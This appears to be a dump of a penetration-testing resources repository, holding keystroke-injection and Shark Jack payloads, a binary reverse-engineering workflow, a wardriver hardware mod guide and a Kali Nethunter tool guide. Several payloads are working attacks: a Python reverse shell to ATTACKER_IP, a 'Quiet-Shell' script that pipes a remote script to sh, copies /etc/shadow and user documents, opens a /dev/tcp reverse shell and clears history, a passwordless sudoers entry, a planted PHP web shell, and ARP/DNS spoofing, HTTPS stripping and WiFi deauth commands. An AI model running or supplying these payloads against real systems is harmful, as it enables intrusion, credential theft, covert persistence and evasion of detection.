$fileHandle, 127 | $payload 128 | ) 129 | 130 | $payloadLength = $payload.Length 131 | $chunkSize = 8 # Kept at 8 for best experience 132 | $chunkNr = [Math]::Ceiling($payloadLength / $chunkSize) 133 | 134 | for ($i = 0; $i -lt $chunkNr; $i++) { 
135 | $bytes = New-Object Byte[] (65) 136 | $start = $i * $chunksize 137 | $end = [Math]::Min(($i + 1) * $chunksize, $payloadLength) 138 | $chunkLen = $end - $start 139 | [System.Buffer]::BlockCopy($payload, $start, $bytes, 1, $chunkLen) 140 | $filehandle.Write($bytes, 0, 65) 141 | } 142 | } 143 | 144 | Add-Type -TypeDefinition @" 145 | using System; 146 | using System.IO; 147 | using Microsoft.Win32.SafeHandles; 148 | using System.Runtime.InteropServices; 149 | namespace omg { 150 | public class hidx { 151 | [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)] 152 | public static extern SafeFileHandle CreateFile(String fn, UInt32 da, Int32 sm, IntPtr sa, Int32 cd, uint fa, IntPtr tf); 153 | 154 | public static FileStream open(string fn) { 155 | return new FileStream(CreateFile(fn, 0XC0000000U, 3, IntPtr.Zero, 3, 0x40000000, IntPtr.Zero), FileAccess.ReadWrite, 3, true); 156 | } 157 | } 158 | } 159 | "@ 160 | try { 161 | $deviceString = Get-OMGDevice 162 | 163 | if ($deviceString -eq $null) { 164 | Write-Host -ForegroundColor Red "[!]Error: Could not find OMG device - Check VID/PID" 165 | return 166 | } 167 | 168 | $fileHandle = [omg.hidx]::open($deviceString) 169 | 170 | if ($fileHandle -eq $null) { 171 | Write-Host -ForegroundColor Red "[!]Error: Filehandle is empty" 172 | return 173 | } 174 | 175 | $payload = [System.Text.Encoding]::ASCII.GetBytes($Message + "`` `n") 176 | Send-Message -fileHandle $fileHandle -payload $payload 177 | 178 | } catch { 179 | Write-Host -ForegroundColor Red "[!]Error: $($PSItem.Exception.Message)" 180 | } finally { 181 | if ($fileHandle -ne $null) { 182 | $fileHandle.Close() 183 | } 184 | } 185 | } 186 | END_STRINGLN 187 | WIN_SAVEANDSTARTCMD(win-hidexfil.ps1) -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/iOS/OpenSafariLink/payload.txt: -------------------------------------------------------------------------------- 1 | REM Version 1.0 2 | REM OS: iOS & 
macOS 3 | REM Author: lukeswitz 4 | REM Description: Open a website in Safari. Delays set for iOS 17-17.1 and may need tweaks. 5 | 6 | DUCKY_LANG US 7 | DELAY 200 8 | GUI h 9 | DELAY 250 10 | GUI l 11 | DELAY 150 12 | GUI SPACE 13 | DELAY 350 14 | STRING Safari 15 | DELAY 250 16 | ENTER 17 | DELAY 400 18 | GUI t 19 | DELAY 400 20 | GUI l 21 | DELAY 400 22 | STRING apple.com 23 | DELAY 600 24 | ENTER -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/Locate-and-Alert-User/badHello.txt: -------------------------------------------------------------------------------- 1 | REM For Windows and MacOS: Make the computer say a personalized fun message including geolocation 2 | DELAY 500 3 | 4 | REM Try the Windows way (this will do nothing on MacOS) 5 | GUI d 6 | DELAY 500 7 | GUI r 8 | DELAY 500 9 | STRING powershell "Add-Type -TypeDefinition 'public class Speech { public void Speak(string text) { (New-Object -ComObject SAPI.SpVoice).Speak(text); } }'; $location = Invoke-RestMethod -Uri 'http://ip-api.com/json/'; (New-Object Speech).Speak('Don\'t mind me, ' + [Environment]::UserName + ', I\'m just a talking computer in ' + $location.city + ', ' + $location.regionName + ', ' + $location.country + '.'); exit;" 10 | ENTER 11 | 12 | REM Try the MacOS way (this will do nothing on Windows) 13 | GUI SPACE 14 | DELAY 500 15 | STRING Terminal 16 | ENTER 17 | DELAY 500 18 | STRING location=$(curl -s http://ip-api.com/json/); say "Don't mind me, $(whoami), I'm just a talking computer in $(echo $location | jq -r '.city'), $(echo $location | jq -r '.regionName'), $(echo $location | jq -r '.country')."; exit; 19 | ENTER 20 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/Python-Reverse-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 1000 2 | GUI 3 | DELAY 200 4 | GUI SPACE 5 | DELAY 1000 6 | STRING 
Terminal 7 | ENTER 8 | DELAY 2000 9 | STRING python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);' 10 | ENTER 11 | GUI h -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/Quiet-Shell/payload.txt: -------------------------------------------------------------------------------- 1 | DELAY 500 2 | REM Description: This script downloads a remote script, performs data exfiltration, sets up a reverse shell, and cleans its traces, demonstrating a comprehensive USB keystroke injection penetration test. 3 | 4 | REM Open Terminal 5 | GUI SPACE 6 | DELAY 500 7 | STRING Terminal 8 | ENTER 9 | DELAY 500 10 | 11 | REM Download and run a script from a remote server 12 | STRING curl http://your-server.com/script.sh | sh 13 | ENTER 14 | DELAY 1000 15 | 16 | REM Create directories 17 | STRING mkdir -p /exfilit/files 18 | ENTER 19 | DELAY 500 20 | 21 | REM Attempt to copy user data if read permissions are available 22 | STRING if [ -r /etc/passwd ]; then cp /etc/passwd /exfilit/files; fi 23 | ENTER 24 | STRING if [ -r /etc/shadow ]; then cp /etc/shadow /exfilit/files; fi 25 | ENTER 26 | DELAY 500 27 | 28 | REM Find and copy files under 70MB 29 | STRING find ~/Documents ~/Downloads -type f -size -70M -exec cp -n {} /exfilit/files \; 30 | ENTER 31 | 32 | REM Set up a reverse shell for persistent access 33 | STRING bash -i >& /dev/tcp/your-server.com/8080 0>&1 & 34 | ENTER 35 | 36 | REM Clean up any trace of its actions from system logs 37 | STRING history -c 38 | ENTER 39 | STRING rm ~/.bash_history 40 | ENTER 41 | 42 | REM Exit the terminal 43 | STRING exit 44 | ENTER 45 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/omg/macOS/SetupHIDXTargetShell/payload.txt: 
-------------------------------------------------------------------------------- 1 | DUCKY_LANG US 2 | DELAY 2000 3 | META SPACE 4 | DELAY 500 5 | STRINGLN terminal 6 | DELAY 500 7 | STRINGLN nano ./setup.sh 8 | DELAY 1000 9 | STRINGLN #!/bin/sh 10 | STRINGLN /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)" 11 | STRINGLN brew install python3 python3-pip 12 | STRINGLN python3 -m ensurepip 13 | STRINGLN mkdir ~/payload && cd ~/payload/ 14 | STRINGLN pip3 install libusb_package pyusb 15 | STRINGLN echo '%admin ALL=(ALL) NOPASSWD: ALL' > /etc/sudoers.d/hxs 16 | STRINGLN wget https://github.com/O-MG/O.MG-Firmware/blob/beta/tools/HIDX/python/hidxshell.py 17 | CTRL x 18 | STRINGLN y 19 | STRINGLN chmod +x setup.sh && ./setup.sh && rm ./setup.sh 20 | DELAY 2000 21 | STRINGLN screen -dmS hxs python3 hidxshell.py -------------------------------------------------------------------------------- /hardware/Hak5-oMG/readme.md: -------------------------------------------------------------------------------- 1 | > [!NOTE] 2 | > Payloads in the omg folder also work with other devices. Ducky Script is cool that way. 
3 | > 4 | 5 | ```pre 6 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠒⢤⡀⢤⣤⣤⣤⠄⣤⠒⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀ 7 | ⠀⠀⠀⠀⠀⠀⠀⠀⣠⡴⢋⣼⠇⣈⣉⣉⣉⡘⣿⡈⢷⣄⠀⠀⠀⠀⠀⠀⠀⠀ 8 | ⠀⠀⠀⠀⠀⠀⢀⣼⡿⠡⣿⡏⠼⠛⠛⠛⠛⠷⠈⣿⡆⠹⣷⡀⠀⠀⠀⠀⠀⠀ 9 | ⠀⠀⠀⠀⠀⠀⣾⡟⢀⡘⢿⣷⣶⣾⠿⠿⢷⣶⣾⣿⠇⡄⠹⣿⡀⠀⠀⠀⠀⠀ 10 | ⠀⠀⠀⠀⠀⢨⣿⠁⣼⡗⠀⣿⡏⠀⠀⠀⠀⠙⣿⡅⢸⣿⠀⣿⡇⠀⠀⠀⠀⠀ 11 | ⠀⠀⠀⠀⠀⢸⣿⠀⣿⡇⠘⣿⡄⠀⠀⠀⠀⢀⣼⡇⢨⣿⠀⣼⡇⠀⠀⠀⠀⠀ 12 | ⠀⠀⠀⠀⠀⠘⣿⡄⢹⣷⡀⢻⣷⣄⡀⠀⣀⣼⡿⣷⣎⠻⠀⣽⡇⠀⠀⠀⠀⠀ 13 | ⠀⠀⠀⠀⠀⠀⠹⣷⡀⠻⣷⣄⡉⠛⠿⠿⠛⠋⣠⣾⡟⢀⣼⡟⠀⠀⠀⠀⠀⠀ 14 | ⠀⠀⠀⠀⠀⠀⠀⠙⢿⣦⡈⠛⠿⣷⣶⣶⣾⠿⠟⢉⣠⣾⠟⠀⠀⠀⠀⠀⠀⠀ 15 | ⠀⠀⠀⠀⠀⠀⠀⠀⠀⢉⣥⣂⣀⣤⣤⣤⣤⣴⣾⠿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀ 16 | ⠀⠀⠀⠀⠀⠀⠀⠀⢀⣾⣿⣟⡛⠋⠉⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 17 | ⠀⠀⠀⠀⠀⠀⠀⠀⠞⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ 18 | ``` 19 | #### Links 20 | - [Official Hak5 Payloads](https://github.com/hak5) 21 | - [o.mg.lol](https://o.mg.lol) 22 | - [Hak5 O.MG PayloadHub](https://hak5.org/blogs/payloads/tagged/omg) 23 | - [@I-Am-Jakoby hak5-submissions](https://github.com/I-Am-Jakoby/hak5-submissions) 24 | - [I-Am-Jakoby Powershell-to-Ducky-Converte](https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter) 25 | - [@Peaakss](https://github.com/Peaakss/) 26 | 27 | 28 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/rubberducky/placeholder.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/sharkjack/LAMPooned/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Shark Jack Payload: XAMPP Persistence 3 | # Author: lukeswitz 4 | 5 | # Setup 6 | LED SETUP 7 | NETMODE TRANSPARENT 8 | sleep 5 9 | 10 | # Change the MAC address of the network interface 11 | macchanger -r eth0 12 | 13 | # Download and install XAMPP 14 | wget https://www.apachefriends.org/xampp-files/7.4.11/xampp-linux-x64-7.4.11-0-installer.run 15 | chmod +x xampp-linux-x64-7.4.11-0-installer.run 16 | sudo ./xampp-linux-x64-7.4.11-0-installer.run 17 | 18 | # Start XAMPP 19 | /opt/lampp/lampp start 20 | 21 | # Set up environment for XAMPP 22 | echo 'export PATH=\"/opt/lampp/bin:$PATH\"' >> ~/.bash_profile 23 | curl -sS 
https://getcomposer.org/installer | \ 24 | sudo /opt/lampp/bin/php -- \ 25 | --install-dir=/opt/lampp/bin --filename=composer 26 | 27 | # Set up a database and user for persistence 28 | mysql -u root <<-EOF 29 | CREATE DATABASE persistence; 30 | CREATE USER 'persistence'@'localhost' IDENTIFIED BY 'persistence'; 31 | GRANT ALL PRIVILEGES ON persistence.* TO 'persistence'@'localhost'; 32 | FLUSH PRIVILEGES; 33 | EOF 34 | 35 | # Download and set up a PHP web shell for remote access 36 | wget https://github.com/flozz/p0wny-shell/raw/master/shell.php -O /opt/lampp/htdocs/shell.php 37 | 38 | LED ATTACK 39 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/sharkjack/byon-nmap.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # 3 | # Title: Bring your own network NMAP 4 | # Author: whoisroot 5 | # Version: 1.3 6 | # 7 | # Scans target subnet with Nmap using specified options. Saves each scan result 8 | # to loot storage folder. Includes SERIAL_WRITE commands for Shark Jack Cable. 9 | # 10 | # LED SETUP ... Starting DHCP server 11 | # LED SPECIAL ... Waiting for host to aquire IP address from DHCP 12 | # LED ATTACK ... Scanning 13 | # LED FINISH ... Scan Complete 14 | # 15 | # See nmap --help for options. Default "-sS -sV -p- -O" scans first using 16 | # SYN packets and then scans all TCP ports, verifies reported versions 17 | # listening and determines the OS. 
18 | 19 | 20 | echo "started payload" > /tmp/payload-debug.log 21 | NMAP_OPTIONS="-sS -p- -sV -O --max-retries 3" 22 | LOOT_DIR=/root/loot/BYON_nmap 23 | 24 | # Setup loot directory, DHCP server, and wait for host 25 | SERIAL_WRITE [*] Setting up payload 26 | LED SETUP 27 | mkdir -p $LOOT_DIR 28 | COUNT=$(($(ls -l $LOOT_DIR/*.txt | wc -l)+1)) 29 | echo "starting DHCP server" >> /tmp/payload-debug.log 30 | SERIAL_WRITE [*] Starting DHCP server 31 | NETMODE DHCP_SERVER 32 | LED SPECIAL 33 | sleep 30 34 | SERIAL_WRITE [*] Waiting for IP from DHCP 35 | while [ -z "$TARGET" ]; do 36 | sleep 1 && TARGET=$(cut -d" " -f3 /tmp/dhcp.leases) 37 | done 38 | echo -e "Target got IP $TARGET from DHCP\n\n" >> /tmp/payload-debug.log 39 | 40 | # Scan target 41 | LED ATTACK 42 | SERIAL_WRITE [*] Starting nmap scan... 43 | nmap -vv $NMAP_OPTIONS -oN $LOOT_DIR/nmap-scan_$COUNT.txt $TARGET 2>&1 | tee -a /tmp/payload-debug.log 44 | echo -e "\n\nscanned host" >> /tmp/payload-debug.log 45 | sleep 2 && sync 46 | LED FINISH 47 | SERIAL_WRITE [*] Payload complete! 
48 | -------------------------------------------------------------------------------- /hardware/Hak5-oMG/sharkjack/sneaky-beacon/payload.txt: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # Shark Jack Payload: Advanced Network Reconnaissance and Exploitation 3 | # Author: lukeswitz 4 | 5 | # Setup 6 | LED SETUP 7 | NETMODE TRANSPARENT 8 | sleep 5 9 | 10 | # Create loot directory 11 | mkdir -p /root/loot 12 | 13 | # Change the MAC address of the network interface 14 | macchanger -r eth0 > /root/loot/macchanger_output.txt 15 | 16 | # Perform a network scan using nmap 17 | nmap -sC -sV -Pn 192.168.1.0/24 > /root/loot/nmap_scan.txt 18 | 19 | # Capture network traffic using tcpdump 20 | tcpdump -i eth0 -w /root/loot/captured_traffic.pcap & 21 | 22 | # Sleep to allow for network traffic capture 23 | sleep 300 24 | 25 | # Kill tcpdump process 26 | pkill tcpdump 27 | 28 | # Set up a reverse shell for persistent access 29 | bash -i >& /dev/tcp//8080 0>&1 & 30 | 31 | LED ATTACK 32 | -------------------------------------------------------------------------------- /hardware/Reversing/macOS-tools-workflow.md: -------------------------------------------------------------------------------- 1 | # Full Reverse Engineering Workflow for Binary Files 2 | 3 | > [!TIP] 4 | > First, ensure you have the tools installed: [macOS get tools script](#macOS-toolkit-installer) 5 | 6 | 7 | 8 | ## 1. FILE IDENTIFICATION 9 | --- 10 | ```bash 11 | file 12 | strings | less 13 | xxd | head 14 | hexdump -C | head 15 | ``` 16 | 17 | ## 2. HASHING & COMPARISON 18 | --- 19 | ```bash 20 | sha256sum 21 | md5sum 22 | cmp 23 | ``` 24 | 25 | ## 3. STATIC ANALYSIS 26 | --- 27 | ```bash 28 | binwalk -eM 29 | binwalk -B 30 | binwalk --dd='.*' 31 | 32 | exiftool 33 | readelf -a 34 | objdump -D > out.asm 35 | nm -D 36 | ltrace 37 | strace -f -e trace=all -s 1000 -o strace.log ./binary 38 | strings | grep -iE 'password|key|token|secret' 39 | ``` 40 | 41 | ## 4. 
FILESYSTEM EXTRACTION 42 | --- 43 | ```bash 44 | binwalk -e 45 | unsquashfs 46 | cramfsck -x 47 | jffs2dump --image= --output=./out 48 | ``` 49 | 50 | ## 5. FORMAT-SPECIFIC DECODING 51 | --- 52 | ```bash 53 | gzip -d 54 | lzma -d 55 | xz -d 56 | zstd -d 57 | 58 | openssl enc -d -aes-128-cbc -in file 59 | xxd -r 60 | base64 -d 61 | zlib-flate -uncompress < file 62 | ``` 63 | 64 | ## 6. ARCHIVE EXTRACTION 65 | --- 66 | ```bash 67 | 7z x 68 | unrar x 69 | tar -xvf 70 | binwalk --matryoshka 71 | ``` 72 | 73 | ## 7. CODEC / COMPRESSED DATA EXTRACTION 74 | --- 75 | ```bash 76 | foremost -i -o outdir 77 | scalpel -o outdir 78 | bulk_extractor -o outdir -e all 79 | ``` 80 | 81 | ## 8. DISASSEMBLY & INTERACTIVE RE 82 | --- 83 | ```bash 84 | # Ghidra: Load binary, auto-analyze 85 | # Binary Ninja: Load, rename, analyze 86 | # IDA Pro: Load, run auto-analysis 87 | r2 -A 88 | aaa 89 | pdf @ main 90 | ``` 91 | 92 | ## 9. SYMBOL RECOVERY & DECOMPILATION 93 | --- 94 | ```bash 95 | # Ghidra / Binary Ninja decompiler view 96 | retdec-decompiler.py 97 | # In radare2: 98 | r2ghidra-dec 99 | ``` 100 | 101 | ## 10. DYNAMIC ANALYSIS 102 | --- 103 | ```bash 104 | gdb ./binary 105 | qemu-*-static ./binary 106 | valgrind ./binary 107 | strace -f -s 500 ./binary 108 | ltrace ./binary 109 | ``` 110 | 111 | ## 11. PATCHING / MODIFICATION 112 | --- 113 | ```bash 114 | hexedit 115 | bvi 116 | xxd > out.hex && vim out.hex && xxd -r out.hex > new_binary 117 | radare2 -w ; wx @ 118 | # Ghidra/Binary Ninja: edit & re-export 119 | ``` 120 | 121 | ## 12. ADVANCED BINARY PARSING 122 | --- 123 | ```bash 124 | # All require Python3 125 | # angr symbolic execution 126 | # manticore multi-arch symbolic execution 127 | # unicorn CPU emulation 128 | # qiling sandboxed emulation 129 | ``` 130 | 131 | ## 13. 
STRIPPED BINARIES / RECOVERY 132 | --- 133 | ```bash 134 | # Use Diaphora or FLIRT for signature-based recovery 135 | # Cross-reference functions manually in Binary Ninja / Ghidra 136 | ``` 137 | 138 | ## 14. OBFUSCATION / PACKER DETECTION 139 | --- 140 | ```bash 141 | Detect-It-Easy 142 | upx -d 143 | binwalk -B # entropy 144 | ``` 145 | 146 | ## 15. EMULATION ENVIRONMENT 147 | --- 148 | ```bash 149 | qemu-user-static 150 | chroot with binfmt_misc 151 | docker export + chroot 152 | ``` 153 | 154 | ## 16. NETWORK BINARY RE 155 | --- 156 | ```bash 157 | wireshark 158 | mitmproxy 159 | pcapdump + strings 160 | ``` 161 | 162 | ## 17. FULL AUTOMATION SUITES 163 | --- 164 | ```bash 165 | firmadyne 166 | firmwalker 167 | firmware-mod-kit 168 | ghidra/analyzeHeadless 169 | binaryninja/headless 170 | ``` 171 | 172 | ## macOS toolkit installer 173 | ```bash 174 | #!/bin/bash 175 | set -e 176 | 177 | # Prerequisites 178 | xcode-select --install || true 179 | brew update 180 | 181 | # Core utilities 182 | brew install binutils coreutils findutils wget gnu-sed 183 | 184 | # Binaries & RE Tools 185 | brew install binwalk 186 | brew install capstone 187 | brew install radare2 188 | brew install ghidra 189 | brew install binaryninja 190 | brew install gdb 191 | brew install gnuplot 192 | brew install lz4 lzop xz gzip zstd zlib bzip2 p7zip unrar 193 | brew install openssl 194 | brew install squashfs 195 | brew install upx 196 | brew install hashcat 197 | brew install yara 198 | brew install foremost scalpel bulk_extractor 199 | brew install qemu qemu-user-static 200 | brew install exiftool 201 | brew install pyqt@5 202 | 203 | # Python Tools 204 | brew install python3 205 | pip3 install --upgrade pip 206 | pip3 install angr manticore unicorn qiling capstone 207 | pip3 install r2pipe 208 | pip3 install retdec-python 209 | pip3 install lief 210 | pip3 install zstandard 211 | 212 | # Ghidra headless support 213 | brew install openjdk 214 | export JAVA_HOME=$(/usr/libexec/java_home) 
215 | 216 | # Cutter GUI 217 | brew install --cask cutter 218 | 219 | # Optional GUI / Emu tools 220 | brew install --cask wireshark 221 | brew install --cask mitmproxy 222 | 223 | # Optional tools: firmadyne, firmware-mod-kit, firmwalker 224 | git clone https://github.com/rampageX/firmware-mod-kit.git 225 | git clone https://github.com/craigz28/firmwalker.git 226 | git clone https://github.com/firmadyne/firmadyne.git 227 | 228 | echo "Setup complete. Add Binary Ninja manually if not using Homebrew-managed version." 229 | ``` 230 | -------------------------------------------------------------------------------- /hardware/Upgrades-Mods/Jhewitt5gmod.md: -------------------------------------------------------------------------------- 1 | # Rev3 5G/UFL Mod 2 | 3 | ### Table of Contents 4 | 1. [Overview](#overview) 5 | 2. [Requirements](#1-requirements) 6 | 3. [Connecting the BW16](#2-preparing-the-bw16) 7 | 4. [Configuration](#3-configuration) 8 | 5. [Verifying Connection](#4-verifying-connection) 9 | 6. [Troubleshooting](#5-troubleshooting) 10 | 7. [Build Modifications](#6-build-modifications) 11 | 12 | ### Overview 13 | Adds 5GHz scanning to the wardriver.uk. **A modified case or slim build is needed to ensure space for the extra board.** 14 | 15 | The [Build Modifications](#6-build-modifications) section at the bottom of the page also has 3D-printable cases that will fit without modification. 16 | 17 | *As described by the creator of this project, Joseph Hewitt:* 18 | 19 | >"The RX/TX of the BW16 should match the SIM800L RX/TX (but don't also connect the SIM800). I'm using the default BW16 AT firmware for now, so don't flash it. 20 | Update A and B from the git main branch, then read the last entry here: wardriver.uk/advanced_config" 21 | 22 | ## 1. 
Requirements 23 | - BW16 module flashed with AT firmware (USB-C units are not compatible w/o flashing) 24 | - [Wardriver.uk](wardriver.uk) rev3 w/o SIM800L 25 | - UFL adapter for the antenna 26 | - Beginner to intermediate soldering knowledge for the UFL antenna mod. 27 | 28 | ## 2. Preparing the BW16 29 | 30 | > [!WARNING] 31 | > Either the SIM800L or BW16 can be used. **Do not attach both**. This mod sacrifices GSM towers for 5G WiFi networks. 32 | 33 | ### AT Firmware Configuration 34 | 35 | **Micro-USB Version:** 36 | The micro-USB version is pre-installed with AT firmware, facilitating immediate deployment. 37 | 38 | **USB-C Version:** 39 | The black USB-C version requires a firmware downgrade. Follow this comprehensive [guide](https://gist.github.com/lukeswitz/ce2aa050e40f398eff0674ae06e95e1e) 40 | 41 | 42 | 43 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/5b36a4b1-6957-431d-92da-516e9eecd43d) 44 | 45 | 46 | 47 | 48 | 49 | ### UFL 50 | ***The soldering can be skipped if you want to use the trace antenna instead.*** 51 | 52 | - Solder the UFL to the pads on the corner of the MCU. Note the orientation on bottom, and apply a little tip tinner & flux if you wish. 53 | 54 | Heat one pad, then quickly move the UFL into position. This must be done with some care and accuracy, but is basic surface soldering. Ensure all three contacts are solid. 55 | 56 | ### Resistor/Solder Bridge 57 | - To activate the external antenna, remove the cover from the BW16. Remove the 0ohm resistor shown in red. Reuse the resistor or solder bridge on the green. Replace cover & tack the corners or reflow (or leave it off). 
58 | 59 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/cae9f924-3cbe-4d57-a12c-3ac39fefaa04) 60 | 61 | *Image credit: @CoD_Segfault 62 | 63 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/a9ad8fc1-6436-4c54-ab06-f8a3666be4cd) 64 | 65 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/3def9a47-e0bd-4c29-84cf-688b4930a496) 66 | *Shown before/after with a simple solder bridge and resistor removed. 67 | 68 | - Test the antenna using an Arduino sketch to validate. Test polarity and continuity manually. 69 | 70 | ### Wiring 71 | 72 | - Connect RX/TX of the BW16 to the corresponding RX/TX on the board for the SIM800L. 73 | - Connect the GND and VCC of the BW16 to the same row: 74 | 75 | | SIM800L PCB Pin | BW16 Connection | 76 | |-----------|-----------------| 77 | | 5V | VCC | 78 | | Pin 2 | Not Used | 79 | | RX | RX | 80 | | TX | TX | 81 | | GND | GND | 82 | 83 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/480fe41f-413c-4852-8a7b-0668ba2d89ad) 84 | 85 | 86 | ## 3. Configuration 87 | 88 | - **Create a plain text file named `cfg.txt`in the root folder of the SD card.** *This is the [advanced config file](wardriver.uk/advanced_config) and has several features.* 89 | 90 | - **Add the line: `sb_bw16=yes` and save the file.** 91 | 92 | ## 4. Verifying Connection 93 | 94 | - Unit should display rev3 5g (mod) when initializing. 95 | 96 | - Once running, an additional number for 5G nets is added next to the 2G count: `WiFi:25|20` 97 | 98 | ## 5. Troubleshooting 99 | 100 | > [!IMPORTANT] 101 | > "There was a breaking change to the upstream ESP32 board library recently. Make sure you are using 2.0.12 because the 3.x branch isn't compatible yet" - Joseph Hewitt 102 | 103 | ## 6. Build Modifications 104 | 105 | > [!TIP] 106 | > Angle the "A" board, allowing enough room for a USB cable. 
Test while assembling: 107 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/afbbf3d7-7c75-4740-a3e8-68f7ed1c509a) 108 | 109 | > [!TIP] 110 | > Solder the SD without the headers, insulate with tape for a few mm of space where the BW16 board (pins removed) will sit. 111 | > ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/1022a50c-d0bb-491f-a843-15096d13b7ed) 112 | 113 | - Cut pins flush on the back of the board for a better fit in the micro case linked below. 114 | 115 | 116 | ### 5G Mod Cases 117 | 118 | You can find cases made by others, modified to accommodate the three bulkheads [here](https://github.com/lukeswitz/3D-Prints/tree/main/Hewitt-Wardriver). Files with `5gFit` prefix fit well without build modifications. 119 | 120 | ![image](https://github.com/Root-Down-Digital/pentesting-resources/assets/10099969/bb499406-4c3e-429b-b93f-93f83e78c329) 121 | 122 | 123 | > [!TIP] 124 | > Slide in the SMA bulkheads first. Twist to ensure the UFLs will lay as flat as possible to the board. Then, angling the board down under the pigtails, carefully slide and seat it. 125 | 126 | --- 127 | 128 | 129 | > [!NOTE] 130 | > ### Disclaimer 131 | > By using the content in this repository, you acknowledge that you do so at your own risk. We are not liable for any damages or issues that may arise from attempting the modifications or any other use of this material. The firmware mentioned is proprietary and not included here. For takedown requests or suggestions, please contact us directly. 132 | -------------------------------------------------------------------------------- /hardware/Upgrades-Mods/PimpMyNethunter.md: -------------------------------------------------------------------------------- 1 | 2 | # Kali Nethunter Additions 3 | 4 | ## Bettercap 5 | Bettercap is a powerful, flexible, and easy-to-use network monitoring and attack tool. 
It is designed to perform various MITM (Man-In-The-Middle) attacks and can also be used for network analysis. 6 | 7 | 8 | - Learn how to perform ARP spoofing. 9 | - Understand how to intercept and manipulate HTTP/HTTPS traffic. 10 | - Perform Bluetooth Low Energy (BLE) reconnaissance. 11 | 12 | **Commands:** 13 | 1. Install Bettercap: 14 | ```sh 15 | sudo apt install -y bettercap 16 | ``` 17 | 18 | 2. Start Bettercap with basic sniffing: 19 | ```sh 20 | sudo bettercap -X 21 | ``` 22 | 23 | 3. ARP spoofing to intercept traffic: 24 | ```sh 25 | sudo bettercap -iface wlan0 -eval "net.probe on; net.recon on; net.sniff on; set arp.spoof.targets 192.168.1.1; arp.spoof on" 26 | ``` 27 | 28 | 4. Perform DNS spoofing: 29 | ```sh 30 | sudo bettercap -eval "set dns.spoof.domains example.com; set dns.spoof.address 192.168.1.2; dns.spoof on" 31 | ``` 32 | 33 | 5. HTTPS stripping: 34 | ```sh 35 | sudo bettercap -eval "https.proxy on; https.proxy.gateway 192.168.1.1; https.proxy.ipv4 192.168.1.2" 36 | ``` 37 | 38 | 6. BLE (Bluetooth Low Energy) reconnaissance: 39 | ```sh 40 | sudo bettercap -eval "ble.recon on" 41 | ``` 42 | 43 | ## Nmap 44 | Nmap ("Network Mapper") is a free and open-source utility for network discovery and security auditing. 45 | 46 | 47 | - Perform network scanning to discover devices. 48 | - Conduct detailed scans to gather information about services and operating systems. 49 | - Identify vulnerabilities using NSE scripts. 50 | 51 | **Commands:** 52 | 1. Install Nmap: 53 | ```sh 54 | sudo apt install -y nmap 55 | ``` 56 | 57 | 2. Scan a local network to find all active devices: 58 | ```sh 59 | nmap -sn 192.168.1.0/24 60 | ``` 61 | 62 | 3. Perform a detailed scan on a specific host: 63 | ```sh 64 | nmap -A 192.168.1.1 65 | ``` 66 | 67 | 4. Scan for open ports on a range of IP addresses: 68 | ```sh 69 | nmap -p 1-65535 192.168.1.0/24 70 | ``` 71 | 72 | 5. 
Check for vulnerabilities with NSE scripts: 73 | ```sh 74 | nmap --script vuln 192.168.1.1 75 | ``` 76 | 77 | ## Aircrack-ng 78 | Aircrack-ng is a complete suite of tools to assess WiFi network security. It focuses on different areas of WiFi security. 79 | 80 | 81 | - Perform deauthentication attacks. 82 | - Capture WPA/WPA2 handshakes. 83 | - Crack WiFi passwords using captured handshakes. 84 | 85 | **Commands:** 86 | 1. Install Aircrack-ng: 87 | ```sh 88 | sudo apt install -y aircrack-ng 89 | ``` 90 | 91 | 2. Start monitor mode: 92 | ```sh 93 | sudo airmon-ng start wlan0 94 | ``` 95 | 96 | 3. Perform a deauth attack to disconnect clients: 97 | ```sh 98 | sudo aireplay-ng --deauth 1000 -a 00:11:22:33:44:55 wlan0mon 99 | ``` 100 | 101 | 4. Capture handshake for cracking WPA/WPA2: 102 | ```sh 103 | sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w /path/to/output wlan0mon 104 | ``` 105 | 106 | 5. Crack captured handshake: 107 | ```sh 108 | sudo aircrack-ng -w /path/to/wordlist /path/to/output.cap 109 | ``` 110 | 111 | ## Wireshark 112 | Wireshark is the world’s foremost and widely-used network protocol analyzer. 113 | 114 | 115 | - Capture and analyze network packets. 116 | - Filter packets to focus on specific traffic. 117 | - Follow TCP streams to understand session data. 118 | 119 | **Commands:** 120 | 1. Install Wireshark: 121 | ```sh 122 | sudo apt install -y wireshark 123 | ``` 124 | 125 | 2. Capture and analyze network packets on a specific interface: 126 | ```sh 127 | sudo wireshark -i wlan0 128 | ``` 